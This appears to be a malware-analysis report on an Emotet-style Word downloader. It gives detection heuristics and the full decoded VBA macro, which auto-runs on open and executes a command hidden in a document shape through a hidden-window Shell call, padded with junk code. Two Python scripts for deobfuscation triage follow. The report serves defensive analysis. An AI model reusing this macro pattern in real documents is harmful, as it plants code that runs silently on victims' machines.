Verdict: MALICIOUS
Risk Score: 272

Malware Insights

MITRE ATT&CK
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1059.003 Command and Scripting Interpreter: Windows Command Shell
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample contains VBA macros that execute a heavily obfuscated command line. The command text is not stored in the macro source itself: Document_open() reads it from a shape in the document body (Shapes("FoWFMbvif").TextFrame.ContainingRange) and hands it to Interaction.Shell with window style 0 (vbHide), so the command runs without a visible window. The rest of the macro is padding: over a hundred write-only assignments built from Atn, CLng, Cos, CByte and CBool calls on undefined names, kept from raising errors by repeated On Error Resume Next statements. When deobfuscated, the command line invokes cmd.exe to set up variables and then uses PowerShell to download and execute a second-stage payload from multiple URLs; those URLs live inside the obfuscated shape text rather than in the macro, which is why the only URL extracted statically is a schema namespace. The ClamAV detection 'Doc.Downloader.Emotet-6826481-0' strongly suggests the Emotet family, which commonly uses this download-and-execute pattern.
Heuristics (9)

- ClamAV: Doc.Downloader.Emotet-6826481-0 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Downloader.Emotet-6826481-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
  Document contains VBA macro code
- Potential Shell call in VBA [critical] OLE_VBA_SHELL
  Matched lines in script:
    taIpTIBw = CByte(4096188)
    zsHBYB = Array(ZDCOcnY, Interaction.Shell(GLLYAI, ZrWtuVwWYRp), VzVfMhbj)
    On Error Resume Next
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] OLE_VBA_DOCOPEN
  Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Document_open()
    On Error Resume Next
- Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD
- Reference to PowerShell [high] SC_STR_POWERSHELL
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace, consistent with the shape the macro reads its command from; it is not a payload URL.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6858 bytes |

SHA-256: f0786dba06ccf80d390345addc774a59446196b181d0e4240f03382579af7cd6

Detection
ClamAV: No threats found (the Doc.Downloader.Emotet-6826481-0 match above is on the document itself; the decoded macro source on its own triggers no signature)
Obfuscation or payload: likely. 153 of 225 identifiers look randomly generated (e.g. 'ZrWtuVwWYRp'), consistent with name-mangling obfuscation.
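The "looks randomly generated" figure above comes from the analyzer's own heuristic, which this page does not describe. As an added example (not the analyzer's code and not from the sample), the script below shows one way to score identifiers for name mangling. The thresholds, the small allowlist of VBA keywords and Word object-model names, and the shortened excerpt of this macro are all assumptions made for the illustration, so it does not reproduce the 153-of-225 count.

```python
"""Score VBA identifiers for name mangling.  Added illustration with an assumed
heuristic; the analyzer's own test is not published on this page."""
import re

# Constructed excerpt of the macro in this report (only the lines that matter).
MACRO_LINES = """\
Private Sub Document_open()
On Error Resume Next
lMBAuLS = Atn(Plvhqmcw)
Set wtLKcaMz = Shapes("FoWFMbvif")
GLLYAI = wtLKcaMz.TextFrame.ContainingRange
Const ZrWtuVwWYRp = 0
zsHBYB = Array(ZDCOcnY, Interaction.Shell(GLLYAI, ZrWtuVwWYRp), VzVfMhbj)
End Sub
"""

IDENT_RE = re.compile(r"[A-Za-z_]\w*")
STRING_RE = re.compile(r'"[^"]*"')
VOWELS = set("aeiou")
# Assumed allowlist: VBA keywords, built-in functions and Word object-model names
# used by this macro.  The author did not choose these, so they are not scored.
KNOWN = {n.lower() for n in (
    "Private Sub End On Error Resume Next Set Const Array Atn CLng Cos CByte CBool "
    "Shapes TextFrame ContainingRange Interaction Shell Attribute".split())}


def looks_random(name):
    """Assumed heuristic: a name is probably machine-generated if it has at least
    five letters and is very short of vowels, flips from lower to upper case at
    least twice, or contains a run of five or more consonants."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 5:
        return False
    vowel_ratio = sum(c.lower() in VOWELS for c in letters) / len(letters)
    case_flips = sum(1 for a, b in zip(letters, letters[1:])
                     if a.islower() and b.isupper())
    runs = re.findall(r"[^aeiouAEIOU]+", "".join(letters))
    longest_consonant_run = max((len(r) for r in runs), default=0)
    return vowel_ratio < 0.2 or case_flips >= 2 or longest_consonant_run >= 5


def count_mangled(vba):
    """Return (mangled, total) over the distinct author-chosen identifiers in the
    source; string literals are blanked first so shape names are not counted."""
    names = set()
    for line in vba.splitlines():
        for ident in IDENT_RE.findall(STRING_RE.sub('""', line)):
            if ident.lower() not in KNOWN:
                names.add(ident)
    mangled = sum(looks_random(n) for n in names)
    return mangled, len(names)


if __name__ == "__main__":
    mangled, total = count_mangled(MACRO_LINES)
    print(f"{mangled} of {total} identifiers look randomly generated")
```

On the excerpt the score is 7 of 9: every generated name is flagged except GLLYAI, which happens to be short and vowel-rich enough to pass, and Document_open is correctly left alone. Misses like GLLYAI are why such a score is reported as a ratio over the whole source rather than used as a per-name verdict.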
Script preview (first 1,000 lines of the extracted script; the extracted macro is 194 lines, well under that limit)
Attribute VB_Name = "sdvuizalhTIAu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
lMBAuLS = Atn(Plvhqmcw)
ZEkup = CLng(azaujZqlq)
cpPid = Cos(tXFWNpE)
BHMQZ = CByte(kfvPbAUQ)
OYzFbOwN = CByte(91035398)
AKNoTjk = CBool(310068097)
tcNaMDV = tAHdEcorz
kcmEuw = 299007284
cXrcjqF = CByte(308735430)
On Error Resume Next
XMQhqUnG = Atn(wptOa)
odUXhA = CLng(zmlts)
uYlnFkjui = Cos(OlSaauC)
UpOLAUz = CByte(nRPivzb)
LjKBniuXK = CByte(29660489)
lPZfC = CBool(235606247)
ZDbiX = oizPfz
RKUOukB = 269665402
vqBwONHNl = CByte(81845991)
On Error Resume Next
uwtHKpn = Atn(jZnQA)
INmtpVn = CLng(qHWvSvS)
AVhKhzKJ = Cos(bkBVI)
iaHOG = CByte(oDipRH)
kPWrpzYR = CByte(233361900)
tJCcjNllH = CBool(226826819)
nVLjM = MSDVPrY
uEsMXjl = 335682939
OFDmEpsD = CByte(68329564)
Set wtLKcaMz = Shapes("FoWFMbvif")
On Error Resume Next
VQTIzIp = Atn(fXTGF)
ivAmmc = CLng(cXOjWzjTP)
GZtCKslb = Cos(IsCpr)
USlbUKFS = CByte(ssFYbIFi)
mMhLRY = CByte(22214756)
KhTzai = CBool(148708994)
ChwsuaBHL = RmMAw
KlCiF = 55562292
MXFzY = CByte(333999993)
On Error Resume Next
OjTpE = Atn(VCYAobo)
KpmbjV = CLng(MojBswJ)
iqZUriwQ = Cos(TPzML)
kGbPpooz = CByte(mnCukoLZ)
PuJPHw = CByte(250796483)
ZfHQYI = CBool(7611859)
wuRhU = qrohDcEfT
qlzQd = 137219493
idiOIsUNf = CByte(6169025)
On Error Resume Next
GDpnh = Atn(cirkfuVVi)
iRXQzNQj = CLng(VVapYL)
ofNkkoaj = Cos(cLBvba)
jEkOkcHtm = CByte(YMYCp)
YuFqIz = CByte(11987589)
qoBWBPnnu = CBool(149393617)
lnwAMXUzd = OLLmsc
VkqiC = 278429604
wakrXTk = CByte(119631527)
GLLYAI = wtLKcaMz.TextFrame.ContainingRange
On Error Resume Next
fviOzbL = Atn(nGrGHWUN)
ujVlhh = CLng(pTjCVL)
vwwKpGcjm = Cos(jOIwbIiHt)
jcjlwN = CByte(YjsITb)
wHJMiH = CByte(262869582)
waBTZQ = CBool(91304233)
AvbsHS = MMcrEA
mQntCTwWd = 254886581
VfFjinzK = CByte(135826882)
On Error Resume Next
AjkjSIUw = Atn(hDpHfLZ)
wjTnAu = CLng(ipribFlc)
ClspiMno = Cos(NfwSV)
pIQNPAwA = CByte(zBcQqWPw)
EFtSkjm = CByte(295116917)
inOqMUE = CBool(268607137)
oXNkFl = rcjXw
zjUNPtWY = 217694898
WVOMZHp = CByte(51598721)
On Error Resume Next
wwHjQI = Atn(vDVWrd)
RNVpjz = CLng(NbvpPJ)
qRRdJ = Cos(fjjKdYpdU)
NhAjGNBG = CByte(dBkWMtA)
HEmEthhnh = CByte(216052613)
MIKmtt = CBool(221715585)
PZzdP = BjuvNU
cZhYhi = 129936211
TwZjq = CByte(300834749)
On Error Resume Next
CAjJTbXGI = Atn(iHUaKjWS)
OFoZJO = CLng(XqZdBlwu)
KNVCjjm = Cos(DZYFw)
GrFZXmNba = CByte(mEhhihzJZ)
AVBPl = CByte(204846459)
hVjpcZ = CBool(454578)
mwLbIL = maQiCFcW
Ofwpkpp = 265119536
TjGrFJihO = CByte(289628402)
On Error Resume Next
qizhYWHM = Atn(IMcjhsfql)
ziCGcsq = CLng(ZoaYiz)
UXKulq = Cos(tKiazDdkR)
OzhCoYVph = CByte(hYWkd)
VNUUwAl = CByte(342159918)
rcCsnnpW = CBool(215866422)
jSKfz = FDkSUotwW
PPzzONhR = 322440673
SzuSrBpbu = CByte(68950230)
On Error Resume Next
UvKjp = Atn(fOQip)
jizbJmHok = CLng(QshDPAc)
IPYVcdHz = Cos(dYUYzBF)
TNJRMYQUz = CByte(RBmmfmi)
aWLBTUK = CByte(93334150)
PPwRrbJ = CBool(315987451)
TVvqIAfz = zmqtiucaj
RupGwtAF = 332187348
aZcqtS = CByte(58428090)
On Error Resume Next
pudnG = Atn(piPpRo)
QSmaWDj = CLng(SUarcW)
NFqJnzar = Cos(DPJFsvE)
RJIbm = CByte(KwcjWZDv)
sCUJzIA = CByte(146577069)
bOWHuiZXQ = CBool(142012186)
TOKaVfM = QERUHm
CXlEwQ = 256679784
AYMDCw = CByte(62802093)
Const ZrWtuVwWYRp = 0
On Error Resume Next
tMpuOj = Atn(NBkurvJCN)
EclKfOT = CLng(swhEZw)
bHzJGa = Cos(QTSPI)
vuOwU = CByte(OsnGN)
VaWjOJbli = CByte(106733753)
JtHzBLSr = CBool(103602683)
OYwik = XjTnAlLl
jjFJo = 147759237
fFEDNCM = CByte(212197293)
On Error Resume Next
RcGfYZSwR = Atn(injGz)
PFIip = CLng(GbdJlsop)
jTYJrr = Cos(cnDjcLYi)
tCqwGSG = CByte(lVfCP)
ZJcvCTKw = CByte(40592208)
ccViGD = CBool(313960119)
zhrqw = FNMUYWMkN
iZAQVKSzw = 196918532
izczhZb = CByte(18562512)
On Error Resume Next
tuOTBqp = Atn(OYVTjn)
KjTGRo = CLng(AknVj)
tMpJENCrT = Cos(BEZAMH)
HsZQRfHV = CByte(pptdf)
JzUBjMOT = CByte(237711478)
rXRBsns = CBool(294691134)
fcHZb = ioEXNzqj
uZjKYWs = 166469312
taIpTIBw = CByte(4096188)
zsHBYB = Array(ZDCOcnY, Interaction.Shell(GLLYAI, ZrWtuVwWYRp), VzVfMhbj)
On Error Resume Next
bnlqZGjpt = Atn(crCttXv)
mHltZGf = CLng(AnGNCvUP)
bvwNQEBR = Cos(jltSS)
mjYvJh = CByte(iLqFti)
ajWnFSbw = CByte(86059072)
DjcVWtp = CBool(225882047)
rbSWYFG = QnWKLS
dCPFMznp = 148816479
sZFsI = CByte(117044986)
On Error Resume Next
PrzNAjzq = Atn(kqZzLi)
fmIDQJ = CLng(rbHfhB)
fsQuGzDi = Cos(Zkjtd)
GakYRA = CByte(CzUFcIlt)
QoaEw = CByte(64222172)
FiNBl = CBool(228809429)
kPlZVj = IkoqpQaAX
sHVTrTYTw = 152105276
tDwDTjjp = CByte(278665600)
End Sub
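Nearly all of the macro above is padding. As an added example (not code from the analyzer or from the sample), the script below strips the write-only assignments and the repeated On Error Resume Next statements from a constructed excerpt of this macro, then traces the Shell() arguments back to the shape they are read from. The excerpt, the list of side-effect calls treated as worth keeping, and the fixed-point approach are assumptions of the illustration.

```python
"""Reduce the padded Document_open() macro from this report to the lines that do
something, then follow the Shell() call back to where its command text comes from.
Added illustration written for this page, not the analyzer's code."""
import re

# Constructed excerpt of the extracted macros.bas: a few of the junk lines plus
# the lines that actually matter.  The real file repeats the junk block many times.
MACRO_EXCERPT = """\
Attribute VB_Name = "sdvuizalhTIAu"
Private Sub Document_open()
On Error Resume Next
lMBAuLS = Atn(Plvhqmcw)
ZEkup = CLng(azaujZqlq)
tcNaMDV = tAHdEcorz
kcmEuw = 299007284
Set wtLKcaMz = Shapes("FoWFMbvif")
On Error Resume Next
XMQhqUnG = Atn(wptOa)
GLLYAI = wtLKcaMz.TextFrame.ContainingRange
Const ZrWtuVwWYRp = 0
On Error Resume Next
taIpTIBw = CByte(4096188)
zsHBYB = Array(ZDCOcnY, Interaction.Shell(GLLYAI, ZrWtuVwWYRp), VzVfMhbj)
tDwDTjjp = CByte(278665600)
End Sub
"""

ASSIGN_RE = re.compile(r"^\s*(?:Set\s+|Const\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$")
IDENT_RE = re.compile(r"[A-Za-z_]\w*")
# Assumed list: a line whose result is never read is still kept if it has side effects.
EXEC_CALLS = ("Shell(", "CreateObject(", ".Run(", ".Exec(", "Execute(")


def strip_dead_assignments(vba):
    """Drop assignments whose target is never read anywhere else, repeating until
    nothing changes so chains of junk feeding junk go too.  Only the first of the
    repeated 'On Error Resume Next' statements is kept."""
    lines, seen_on_error = [], False
    for line in vba.splitlines():
        if not line.strip():
            continue
        if line.strip().lower() == "on error resume next":
            if seen_on_error:
                continue
            seen_on_error = True
        lines.append(line)
    while True:
        refs = {}
        for line in lines:
            for ident in IDENT_RE.findall(line):
                refs[ident] = refs.get(ident, 0) + 1
        kept = []
        for line in lines:
            m = ASSIGN_RE.match(line)
            write_only = m and refs.get(m.group(1), 0) <= 1
            if write_only and not any(c in m.group(2) for c in EXEC_CALLS):
                continue  # e.g. taIpTIBw = CByte(4096188): assigned, never read
            kept.append(line)
        if len(kept) == len(lines):
            return kept
        lines = kept


SHELL_RE = re.compile(r"Shell\(\s*([A-Za-z_]\w*)\s*,\s*([A-Za-z_]\w*|\d+)\s*\)")
SHAPE_RE = re.compile(r'Shapes\("([^"]+)"\)')


def resolve_shell_call(lines):
    """Follow Shell(cmd, style) back through the assignments and report where the
    command text is read from and whether the window is hidden (vbHide = 0)."""
    assigns = {}
    for line in lines:
        m = ASSIGN_RE.match(line)
        if m:
            assigns[m.group(1)] = m.group(2).strip()
    for line in lines:
        m = SHELL_RE.search(line)
        if not m:
            continue
        cmd_var, style_arg = m.groups()
        chain, name = [], cmd_var
        while name in assigns and len(chain) < 10:  # bound the walk against x = x
            rhs = assigns[name]
            chain.append(f"{name} = {rhs}")
            head = IDENT_RE.match(rhs)  # 'wtLKcaMz.TextFrame...' -> 'wtLKcaMz'
            name = head.group(0) if head else ""
        style = style_arg if style_arg.isdigit() else assigns.get(style_arg, "")
        shape = SHAPE_RE.search(" ".join(chain))
        return {
            "command_chain": chain,
            "shape": shape.group(1) if shape else None,
            "window_style": int(style) if style.isdigit() else None,
            "hidden": style == "0",
        }
    return None


if __name__ == "__main__":
    core = strip_dead_assignments(MACRO_EXCERPT)
    print("\n".join(core))
    print(resolve_shell_call(core))
```

On the excerpt the stripper keeps eight lines: the header, the Sub, one On Error Resume Next, the Shapes lookup, the TextFrame read, the Const, the Shell call and End Sub. The resolver then reports that the command comes from the shape named FoWFMbvif and runs with window style 0. What is still missing is the command line itself: it is the text of that shape in the document body, so re-running olevba on macros.bas will never show the cmd.exe/PowerShell string, and recovering it means pulling that shape's text out of the document.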